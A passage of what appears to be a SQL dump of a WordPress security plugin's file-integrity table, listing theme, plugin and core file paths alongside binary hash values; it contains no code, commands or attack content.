U?�S�s�H�ב�Y��ٳ','',0,'?'),('%.�.Ct�=����\\`','wp-includes/sodium_compat/src/Core/SipHash.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b�v�1^l�&)g�4��','-�l����/6�\\����jx�R�\0Ю��~�','',0,'?'),('%4*T�@Q�s6�F�5{�','wp-content/themes/quicksand/js/lightgallery/img/vimeo-play.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��vKO�DÈ6�a1��','�������m,�E�(^�Z��1ρ�>��','',0,'?'),('%6���E��\'��+__1','wp-content/themes/wp-simple/inc/kirki/tests/test-kirki-add_section.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r�f�v��QЗ�˪','���9!�8s=�q����T��a�-�̫�6','',0,'?'),('%8���Z�\'c�Z���','wp-content/themes/enigma/css/font-awesome-4.7.0/css/font-awesome.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ʔ�q�3��[�','���qa#T0��T�n=���8X\n�Bg%΀L�','',0,'?'),('%9o��	�{����o','wp-content/themes/hitmag/inc/dashboard/theme-info.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','BK�`s�S���:�I5�',';e	��L�ٯS�X%ENK �vtn��0G���','',0,'?'),('%?f�E���Ms���','wp-content/themes/twentytwentyone/assets/sass/05-blocks/latest-comments/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'G߻�V�I���','%[	kdT�9���5|�}-����U�$s_�W{�','',0,'?'),('%D?�m1QZ\"�cAXQq�','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Insights.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G���=���1\nV�0�','8}�>��k6`��uid��eH�P�^�','',0,'?'),('%u1+9t�.uN����','wp-content/themes/edge/woocommerce.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Oh���Z��S�','�\n\n��^�_N4�.{�\r��p�`=�Q9�1�','',0,'?'),('%}�M���ha&�6�','wp-content/themes/twentynineteen/js/customize-controls.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�2Z�P�s>��I�r','E�0R�p4RR���b\\`����a1&�g�����','',0,'?'),('%�~��t�d&{��','wp-content/themes/advance/inc/kirki/assets/scss/sections/expanded.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��F� \0�w�k�{�',')��k�/>-ԕ�ܳkR#�H@�-�<���','',0,'?'),('%���\Z3�U�]�.�','wp-content/themes/Kent/FT/plugin/options-framework/includes/class-options-media-uploader.php',0,' 3r7z��Vy�g �X��',' 3r7z��Vy�g �X��','Nٝ�cǐ�%�QQ�^�p���h�j:r���ӯ','',0,'?'),('%�=yv�����D�','wp-content/themes/hitmag/inc/kirki/assets/css/customizer-dynamic-css-width.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g��8�RR��J���','��}��ڝ���$X����Y�\0%tJ�\'���','',0,'?'),('%���\\ܓ�Ę\"<��\'','wp-content/themes/catch-responsive/js/source/jquery.cycle/jquery.cycle2.tile.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����O�T�;\r�0�','$���]�P����t����&B�߳w#��ӄ�a��','',0,'?'),('%�\"%�6��wR#*��{�','wp-content/themes/education-hub/inc/support/footer-widgets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Q�A�8�?��t:�','��7f�>��6�$7V�����^r�_���\r=�','',0,'?'),('%���9��\\ދ�','wp-admin/includes/class-wp-site-health-auto-updates.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!���W���Ni\r��ag','��Z�I��%�W��~�h\0x�ir�!��cJ�b','',0,'?'),('%�&����)��h7�','wp-content/themes/simpleshift/inc/kirki/assets/js/controls/radio.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{4��ȦAGȲ�n��\"','I��\r�α���m-g����$s�=�\\�O���&+','',0,'?'),('%�j��v��2�.�','wp-content/themes/wp-simple/parts/image-750_500.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&/�	8uZ\"��,��','y�>a���z�;�h�zZB>�JaB5��}��\"','',0,'?'),('%����8^�V<�t�','wp-admin/edit-tag-form.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ߜ8���]��a','Z��<P���^�k$�>aK�a��G��s*','',0,'?'),('%�fW���	�P0�}+','wp-content/plugins/wordfence/modules/login-security/img/menu.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p����]�j-����','8�����#̄(8��O�\"�	+h\"Fb��','',0,'?'),('%�$�\'?�aם۲r�F','wp-content/themes/wp-simple/inc/kirki/assets/scss/controls/number.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ϟ�C���U�{�','*Cz��I�;�R*��$��wE�pv���Qp�','',0,'?'),('%Ŋf+�h�ø^d��\n','wp-content/themes/the-best/js/modernizr.custom.46884.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�A��\'I�{u�}����','���ebH�-~[�D\"~Y|\Zh6<4�&�X','',0,'?'),('%�Pb.��8�Gd�t�','wp-admin/css/media.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(;Hd����(�_�e�R','Sݱ`�� 6�Xi�\0�v�4K��E�qzi','',0,'?'),('%����bDŽgOl�K� ','wp-content/themes/gambit/js/navigation.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����Ak�.npOh�','+�H�Hn���+MYФalVD��\rp��#��U','',0,'?'),('%���g�c�\n/�>�','wp-content/themes/wp-simple/parts/content-single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���AJ��p潺p','؃��hGŐ��g����N!}�+���?����Y?�','',0,'?'),('%�~2\" ض=�ǿ\Z^�','wp-content/plugins/wp-cerber/assets/magnific/magnific-popup.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0���vre����\n�`�','�X�;��Ɛ��9�@u�j�m�[��F�\"!�','',0,'?'),('%�\ZC����H�O�K','wp-content/themes/catch-responsive/content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�<Ĭ�6���a=�#','�a�ɮ�8h�O��j�e��)�+�u$/�aJ�\r','',0,'?'),('&u��.-<�ӈ���+','wp-content/themes/wp-simple/parts/frontpage-test.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���.��f��4]�','a����+���CNjw�;K�岮!`�@�Ǎ�#','',0,'?'),('&PDt�?5u�1Ym��','wp-content/plugins/wordfence/crypto/vendor/composer/installed.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����q�jy*_iI�','��z�~t�i������D�5\Z�9l9;�I�','',0,'?'),('&��JuBßǃW�&:','wp-content/themes/weblog/acmethemes/customizer/design-options/default-layout.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�No�ts$m���{','�~q�����{��A��*�f6��K*BLF�6�','',0,'?'),('&*���dĆָ�	�H5','wp-admin/images/align-center.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	�\Zݶ�4y�dY1�e�','�놽N3�X!��lj�h`�����hA]�J�','',0,'?'),('&.��C���F�h\\-�2','wp-content/themes/twentytwentyone/inc/menu-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|8\0�=5xv���3�','��y��\nI����\\��d��0����M�U','',0,'?'),('&=\Z�+t�\"�/k\'\n','wp-includes/js/jquery/jquery.form.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','܉l�Ȍ��*��D�','zt�O1� =2X����Q���_�y �}Z\r','',0,'?'),('&O�\n�$�?�#V��/�o','wp-content/themes/wp-simple/parts/error-no_results.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','qɀ�\\/yn��Ӷ�%^','��&eCJ�W�S��`a��\nh\"�,���z�;�','',0,'?'),('&P��!�=H����-v�','wp-content/themes/graphene/js/jquery-ui/images/ui-bg_highlight-soft_100_eeeeee_1x100.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8L?p���	�#���','(�����r�hy�j/�\rB�s)ǚ�d�E��','',0,'?'),('&ee�\n3K���vZ��','wp-admin/ms-delete-site.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?bڔ��3��\r\n]m��','�jn�B����TN�&�e��>h��m���uIz<','',0,'?'),('&k\0v_fcb��v�����','wp-includes/js/dist/format-library.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9���h���d6��.{�','�H��? �pq+���t?��l��U��n\'�o�Q�','',0,'?'),('&m�\\2F��?\0�','wp-content/themes/wp-simple/inc/kirki/assets/images/jquery.fs.stepper-arrows.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/!C�\ra2���ռ;��2',' �^���$Vy˃0?�N�}�H6��?鶬','',0,'?'),('&q���i�b]^Ё�(��','wp-content/themes/wp-simple/inc/kirki/kirki/assets/scss/controls/number.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ϟ�C���U�{�','*Cz��I�;�R*��$��wE�pv���Qp�','',0,'?'),('&t!0^g��bJ�c,>3','wp-admin/upload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����E_-�\r3�','X΢˔&��(�N�\\F�0%��o�0��>�','',0,'?'),('&uw4��!VS���','wp-content/themes/wp-simple/inc/kirki/kirki/assets/scss/controls/switch.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','AT��\Z>�n�\'rw�,�','-2 }�\r^�#�k\Z����u�l��TV�. ','',0,'?'),('&~�*m�E+nX�%;[O�','wp-includes/css/dist/block-library/common-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ne��:ʎ)����hVH','�v7��7��a�L�zи�?9!D��4�','',0,'?'),('&D���Q�R��w�]','wp-includes/sodium_compat/src/Core/ChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��-r�jiI�أe�b','��b��E����&q�����*��������','',0,'?'),('&�U�@	��rL%;','wp-content/themes/chronus/assets/js/navigation.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t`<\\�6�ے\Z4�/','�v}Y`�~��܎��ll`>��ެ�P��G�5��','',0,'?'),('&���ɚ%��)�W&�i','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/RepresentedCountry.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>XVD��m�|P6\n','�l=�b:џ��	R�Z��	�����	��6','',0,'?'),('&�f-��o.СT��1','wp-content/themes/saybusiness/js/custom.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','խ�7��\ZwhCAn�',',q\0_:z4BR\n��!H��E��V��;��	3j','',0,'?'),('&���Rw?~�j�hJ�D','wp-includes/Text/Diff/Renderer/inline.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\n�n5�P�����B\'�','X�U.k⻺�@-(��5�N�����V','',0,'?'),('&��]0W��\n)�=��','wp-includes/js/tinymce/plugins/directionality/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Er�HD��D��3��@','<����o�@�:����-�Eg���)6^Ѽ\'��','',0,'?'),('&�`�O�Q5�Q�43�','wp-admin/theme-editor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G�\"��}<м�鵴','$��Sl����\Z���P5��z7���H�','',0,'?'),('&���	P�shcusS','wp-content/wflogs/attack-data.php',0,'#ح\n���y�Ib�\r�\r','#ح\n���y�Ib�\r�\r','l��4Eq�{���������\'wg�31�c�w:�','',0,'?'),('&�vA��Q��c��qw8,','wp-includes/theme-compat/header-embed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Omz8��F����','�����})d!q	,@,��j��v	����E���','',0,'?'),('&Ҝ��T�_Wճ���1A','wp-content/themes/advance/inc/kirki/assets/images/kirki-bottom.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x*QX�WTe���8�','�cA(Ϲ��0��\ZQ\n/���B�9��B���c','',0,'?'),('&��8df�g*V��-','wp-content/themes/hitmag/inc/kirki/assets/images/2cl.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�̯nj��h�\'Y�','���g:�s�\'\\���9S����>,�d[�e&u���','',0,'?'),('&饱����W��؀�|�','wp-includes/widgets/class-wp-widget-links.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�x�/k�h\n��ֽ[Nv	','�쇉���,�x���-��DO�,��7ш�Q�','',0,'?'),('&�Y���z�q�[F�f@�','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/WebService/Client.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ⶨ�;*���?��z�','���:O.�\'�~y��@�Y`FMN�:�n�.�;q@','',0,'?'),('&���PV�w��Ss','wp-content/plugins/wp-cerber/cerber-2fa.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\nqd��Ը��}��','��\Z�����h��=RG��0��%̪���	�Mm6','',0,'?'),('&�aUG���κG��','wp-content/themes/twentytwentyone/assets/sass/05-blocks/quote/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���!!o=b��i','k�����{��G9��W1h��`���sҗ�D`�M�','',0,'?'),('\'�edQ5hb��@','wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/mode/php/test.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	�A&�G�o#\"����Q','D�T`�O\nq��m�HZm �ό1���','',0,'?'),('\'�r#ܙ������I!�','wp-content/themes/singularity/inc/customizer-library/custom-controls/content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n���=Y._/ܦc��|','L�^?3�~��R�=ʏ*�C�\"����wuUg��','',0,'?'),('\'-b������J�a ','wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/mode/htmlembedded/htmlembedded.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g�E�8y�{���^��','��Q/:�(r{u���\0��kwVn��dT��PJX','',0,'?'),('\' �\rNo�O���','wp-content/themes/newsmag/inc/admin/welcome-screen/sections/changelog.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'-m�,��k�9�~G0','�R@/~�Z�v��G��&z���K��U��','',0,'?'),('\'=!Za��a���jU�Q','wp-admin/css/site-icon.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���}�E���p0lu','i>œӺ#�&�2Z�\'��K(*�����','',0,'?'),('\'Ac���,	~�6�ܦ�','wp-content/plugins/wordfence/views/onboarding/tour-overlay.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:��%� �);�\0','\Z��\'ġ맪���.s\'��sd�4�^��I','',0,'?'),('\'F���\Z �X�;!܉','wp-content/themes/graduate/inc/customizer/theme-options/homepage-static.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��o�?�\Zk���_�o:','*�`�]v�6컯�|*6��U2�5�\'�!ѽ','',0,'?'),('\'G�~\"{�ş��[�3�','wp-content/themes/monograph/genericons/genericons.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E�� /��R��0��','��;�Ji2�4�{3��.��(^�Z}řۉ*E','',0,'?'),('\'I+��zzY�m}��L','wp-content/themes/weblog/assets/library/owl-carousel/owl.carousel.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��lb�[�D(.��B�bY','^S����B�ŅZ�C8�\\s�P��c7M��[\n','',0,'?'),('\'M��w�񑍷���\rKj','wp-admin/includes/class-wp-site-icon.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�W~��0�d���y�','_9��%7�N׌�[\"��m�;Xi:RG�x^�q]','',0,'?'),('\'P��AK�w\"���49��','wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/mode/coffeescript/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@n-��N4� �`G','i��5.��;�W)��?8\n�|K�VMKH��','',0,'?'),('\'T������9�Yl��>','wp-content/themes/education-hub/js/navigation.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�9y�:����ا��X�','��WKQۇ\Z#��?~���a����	C��','',0,'?'),('\'_:�χy�+\r�P�0�','wp-content/themes/graduate/assets/uploads/no-featured-image-600x522.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����`�*>A�','ڏh��E�(���~#Z��2�����X��ƞ��','',0,'?'),('\'aPW«�d(sT6CG','wp-content/themes/quicksand/archive.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2��s|r�k�U�\\B','C�}�����N?E�eSg#��m��\'ʼn��>K\'y','',0,'?'),('\'q�� ��e�����c','wp-content/plugins/wp-cerber/assets/tpicker/jquery.timepicker.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��oD�Z3���nR��w','�c�4r)|��V��_kZ�n��:\"���Q%��','',0,'?'),('\'s.��*���/w)��','wp-content/themes/lovecraft/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��DÈ5��^�>`���','�}��_\'�	�O���DZV������&��ZC�','',0,'?'),('\'w�t�(�v���#0','wp-content/themes/wp-simple/inc/kirki/kirki/includes/field/class-kirki-field-dimension.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'Qt����>,���','s��ȋx��ǫ�pL�>��E	�*j�9��*fE','',0,'?'),('\'y3{��9�^�U;�00','wp-content/themes/wp-simple/inc/kirki/includes/field/class-kirki-field-select.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ވ����RxBB��dK','N�\r��v���r����\r7C�H��G+���','',0,'?'),('\'{��yξ�ee�]�C�','wp-content/themes/metro-magazine/inc/widgets/widgets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��頇���A7�E�5*','�k�C�(�l�ސq[�C�gv������z����','',0,'?'),('\'���� �o���S��','wp-content/plugins/wordfence/images/icons/ajax3.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','mw�ߴtꍓ\'\n���s','�dz��\n�yK�Ʈ��\'#]�x	VJR��.=:','',0,'?'),('\'�\"z��n��p��aE','wp-content/plugins/akismet/views/enter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�EG�T��A>�sJ','F���R�<`�=#i�z�Ag�Dd)��q','',0,'?'),('\'�s�kV~�#���X','wp-content/themes/advance/inc/kirki/assets/js/controls/typography.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N���� c[/��/n','�����z��4Y����L\Ze�^�@�(��','',0,'?'),('\'���q#�]#X��q','wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-repeater-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��F׈�6�!�z��R','>߃$3���*��>$ֻ-t�����,���','',0,'?'),('\'�g|͹\"���jݹ2�','wp-includes/js/jquery/ui/effect-transfer.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','OԩN��i���1','Ł\0p�,�\\�!ON)�Q���Xl ��k�s�l�','',0,'?'),('\'��pBɂ��S�xV','wp-content/themes/metro-magazine/screenshot.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6c�$R�J9�-�ٍ\n4','�E����(��S��r������E������','',0,'?'),('\'�Z?��X��W�<�','wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�a͐��\r����','u�^K���\n���ih��C�d.i�H�-��j�l�','',0,'?'),('\'����t\\JZ�Ah�','wp-content/plugins/wp-cerber/assets/flags/se.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5r5�E&a��_�&�	','Wh�LP!����#O�QkJ�Nj�9u`$�c��','',0,'?'),('\'���_iYm1��R','wp-content/plugins/wordfence/views/scanner/scan-results.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r��Z�}giؑz2*P','��wu�p	-���D����<z�w榀UD4�Ԥ','',0,'?'),('\'�7F�x5�sZ����','wp-content/themes/education-hub/inc/hook/slider.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H�\r����]l�M�','.��4Z�_�2g�x	6�z��gғ\nL0���','',0,'?'),('\'��=�-���AC\\K','wp-content/themes/twentytwentyone/assets/sass/07-utilities/color-palette.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�e�s�Aq��tf>�\Z9','k�:����4�j�(��$����緪��c���','',0,'?'),('\'�[7C�=�\r�$w\\�','wp-content/themes/exoplanet/images/arrow.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���*<����l�C\\','�需�q�T��bq�T�r��>;��Uf','',0,'?'),('\'�  $>���fja�=','wp-content/themes/monograph/screenshot.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�C�e�[k=E�s¦.','��\0�JT�eDʿ�A��L�s�׸�?*}��R','',0,'?'),('\'��1wE�Ou{z����','wp-content/themes/wp-simple/inc/kirki/assets/js/kirki-branding.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@��وn���nĊ��','��-P��XIv�`�!��=�*�#J������','',0,'?'),('\'�z9>T�n]A�cdݔc','wp-content/themes/graphene/images/social/pinterest.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[�0&s���ķ�I�Mw','&�C@��O(ד\Z.���H}��3	�ODH��z	','',0,'?'),('\'�,��r\n\n\r\Z�3�','wp-content/plugins/wp-cerber/assets/flags/mc.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3\"0\r�2O�>�=D1�\0','�0�0V�>�K[�5_��R~�dy�� \ns��S��','',0,'?'),('\'�:�K�00W\08w��','wp-content/themes/graduate/assets/css/blue.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{S��z\'�1�\r-�}','�%�\n`�=L|sf܅��p����6���','',0,'?'),('(��g%\0��4��l>��','wp-includes/js/jquery/jquery.schedule.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&��T�k�f؞���','��?��vEʔ��wj���C�P՝��_��','',0,'?'),('(&*jz���;(e�d��','wp-content/themes/enigma/css/photobox.ie.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����ls�m��A�&S�','�3ij�zT�������YdC��	���l��','',0,'?'),('(=m\r�\'�2�)���ä','wp-content/themes/advance/inc/kirki/assets/images/3cr.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ٱ�!+S����i?','�&�P��tAez��s��j�ۤݥAd}��ʄ','',0,'?'),('(?���>��S�N揚�&','wp-includes/images/media/default.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-����I�B�h�@���b',':�oL�JDj�$->�i��\'�6n֠��Ui','',0,'?'),('(N\\]n��t��i\nȚT','wp-content/themes/enigma/sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��}��sT�w3���','���\rT����G��~����h)�cv\'�r','',0,'?'),('(N����ڄ���לP�','wp-content/themes/wp-simple/inc/kirki/includes/settings/class-kirki-settings-repeater-setting.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��-����_�G^ަA�','����#9�K��K&QJ�A�s�ȁ�G�4z#�','',0,'?'),('(Q�*��w�Y�a','wp-content/themes/simpleshift/assets/css/bootstrap.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F�U�hcr�Ԫ����&','��7�w�b*֕f��\r�r�1Jk��׫ad�','',0,'?'),('(WQ=3��y��b6','wp-includes/cache-compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�?�Iq_��P�$ӄ','���]4\'��9���w�E��J�J�\r�nh�','',0,'?'),('([d��������BQ��','wp-admin/js/updates.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K��5�yP��Õ�{','��NI7`&\'�8�Zt���U�-��*��n�/Y','',0,'?'),('(m:w����ⴀ�','wp-content/themes/enigma/author-intro.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e����L��n2� ','�WG[�\r�VCrbOB\'�� �ų��䕿�','',0,'?'),('(n��i�Qiƪ*[�','wp-content/themes/graphene/search-404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��jƾ �l�lb��n','�e�|��v|Y��Ƣ�\Zw��y+T�0�\\','',0,'?'),('(ts���i�,X��\'#','wp-content/themes/wp-simple/inc/kirki/kirki/includes/field/class-kirki-field-toggle.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\n��>��•:\\)�O&','�*b]E�&�JαŠ�\\��4\0b1�>.w!�','',0,'?'),('(x*J���,�LÛn�<K','wp-content/plugins/wordfence/images/icons/arrow_refresh.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k�w�`�`�|�}$G��','u�/2/����@�H�_Ilh����/�aU:�	','',0,'?'),('(~6vqV�0�{�\"','wp-includes/ID3/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ݣ��z�eѧѥk58�','l��r����p4��FBܢ7\"Z:�W�v���','',0,'?'),('(���v|T�— ¥�','wp-admin/includes/screen.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ɬV\Z	j���A��|�','~Ky�i�2j*SgT<�q{�aa�%���;���;�','',0,'?'),('(��Ȅ��2k_�2��','wp-content/themes/wp-simple/inc/kirki/kirki/includes/dynamic-css.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0��& �u[ήЯ?�3','ǣ�����b �n/�C�X���<�lF�S�','',0,'?'),('(��G����W�@\rct�','wp-content/themes/wp-simple/inc/kirki/kirki/includes/class-kirki-enqueue.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�bG\Z^y	��7\\sLd^7','#zR������:��+zb)��������~�','',0,'?'),('(��G��6L���j6','wp-content/themes/edge/inc/customizer/functions/featured-content-customizer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�>f�xd��O��','\n��3;xV�\nA�6��{��>8t��̴��uF�6','',0,'?'),('(���y\0	�pDO�`','wp-content/themes/twentynineteen/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*����\0���a��6R','��:�g����~{l���E�8��1XT`CYH','',0,'?'),('(��C\n֊��bAk6FS','wp-content/plugins/wp-cerber/assets/sh/scripts/shCore.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H���l7�B����20O','%{��*ZO5��D�\n�¦+�1T�c���#`','',0,'?'),('(�Y�\'��^kz!q����','wp-includes/js/dist/block-directory.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*U���ܰ��(���','��5�~�Y*�2M���3zf�f%���w�L�qՇ�','',0,'?'),('(���+1sJ��Jʂ�','wp-content/themes/graduate/assets/plugins/css/slick-theme.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����U�1��3��','M�cS�T=�f:LU��ֶ��n�T�X��','',0,'?'),('(����4ߨ�ц����','wp-content/themes/singularity/inc/customizer-styles.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Y����g�U�D>�{�','2�ت�4�H�Rr�pF��t���Ӛ�Qv��','',0,'?'),('(��	`���o�f1�','wp-content/themes/newsmag/inc/admin/welcome-screen/sections/getting-started.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j]�f\rB��ʻ{k','�7M�����J��Y�Q�W=����,�','',0,'?'),('(��Օ�)�(pwBl','wp-includes/js/dist/list-reusable-blocks.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^��\'}�w����0b','��\\o�U0.RoIOqe?�~�`ٰ�E�i�.','',0,'?'),('(�|�Z�x�T���[�u','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Base64/Original.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z?��(��E�Wup�','�+���D�\0ej�\rg���ϧ��4�','',0,'?'),('(���>f0\Zg[|���','wp-content/plugins/wordfence/lib/wfJWT.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}{ j�N���c�K�','0mhN`x�x~H�Lj�s����O��P��,','',0,'?'),('(���$���v��W5�','wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/mode/sql/sql.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&ҁ|���z|$�n��','\ZfE��-����\0�K���>�� 